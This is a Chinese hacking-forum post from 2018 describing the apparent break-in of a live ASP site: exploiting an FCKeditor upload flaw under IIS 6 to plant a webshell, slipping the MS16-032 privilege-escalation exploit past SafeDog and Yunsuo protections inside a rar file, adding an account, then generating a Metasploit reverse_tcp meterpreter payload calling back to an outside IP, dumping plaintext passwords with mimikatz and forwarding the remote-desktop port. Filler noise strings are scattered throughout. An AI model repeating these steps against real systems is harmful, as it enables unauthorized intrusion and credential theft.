找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2190|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

, ]8 F m3 k5 D- @

* g: \6 b% p% e3 i/ u, w5 L6 s' k) R* \3 c2 _) ?% K4 W$ B4 p# [, G# i h- i( O( `! Z9 ]' e- y6 f) B; l+ w- e# n9 S- @. s6 q( c2 v P
; z& {+ R9 y7 [, H( k

, x' i- @; u K
/ k& t' {) ?) @( ` A
一、 利用getwebshell
; A3 o6 g) u: Q/ V7 @# L
2 F' x& v5 ]% P) J8 ~9 @
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
! s' `& |9 r$ [- j4 O, @
& S: H4 \6 I k( D" X222.png
9 Z( |3 j) Q, K
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
9 o5 ]) b1 {: c6 ?' A$ \" S& n( E333.png
- B. ~5 z/ A- J9 e9 Y; W
下面我们构造一个asp目录,如: + q1 z' j2 E3 P7 O+ u$ Y1 Z

7 h q' }4 O8 p& K

1 H3 Y# Z1 ^. s% E/ S http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 / Z8 |" `* ?5 ]

4 B0 q6 {' t# p- C$ |; D9 ^: Y

' I8 a& \/ R+ C" V& ?8 C6 j2 J 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
: J( L7 J$ V+ x# X1 l% [7 w3 {
- a( T0 ]3 x1 U' q* T6 a4 e. q
一、 绕过安全狗云锁提权并且加账号
) r9 l( i: q7 K2 q+ i: a 444.png
& Z- T3 X9 A+ K5 j" c
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
% A2 o, }* u) a [4 j
0 Y$ ~# q% J4 f4 @/ Y
如图:
& P4 U/ Q) _0 G& c3 a555.png
1 V. s0 a7 u/ Q
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
: ~' ]) Z/ s- ]9 w; H9 Z
5 ]* p C6 J, T% K# g
一、 利用metasploit
! Q7 P* h+ C3 ], k& E( o! l( m+ S
2 `5 J- v" a; ?2 l2 ?* C
首先用pentestbox生成一个64位的payload如下命令
+ Y5 R5 @1 z8 o+ h" y4 t1 u
, e/ }( [' [/ V& ? msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
0 s/ p/ m. U% J i
0 G* K T! t! ?
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
. {' Q/ J3 l7 M' @; r& ^11.png
7 z+ g+ [! t4 A3 O% w
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
# y1 K3 v8 c! ~+ f- r/ P, U 13.png
6 A2 S9 k0 G& |9 Z
下面我们来做一个监听如下命令:
) @* @2 ~/ p3 A H8 C9 }4 L6 ~
! N' s5 F; D, B( j1 l/ q portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
% H( V4 y+ w+ @3 e" l1 l# p 18.png
; {1 C! e( U. q

" g' R) {/ L- O6 ]
2 h y2 n% }# K0 d+ Q

, H& i& V h$ ]. [

* \3 ^8 l. v4 m0 e! d
* `- R2 v8 C% V) |- F5 a/ A. {
3 n0 V3 F+ B( d' q& D
) v2 c4 [/ Z# T# y4 i7 D: m

& \' s _! j' ]/ ~
' q3 z& N1 G; Y: b7 _, O D ; o4 N K$ g: T

/ H1 W# Y$ L8 V; _/ O4 _
/ {# w, Y2 q% T$ k1 F$ D

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表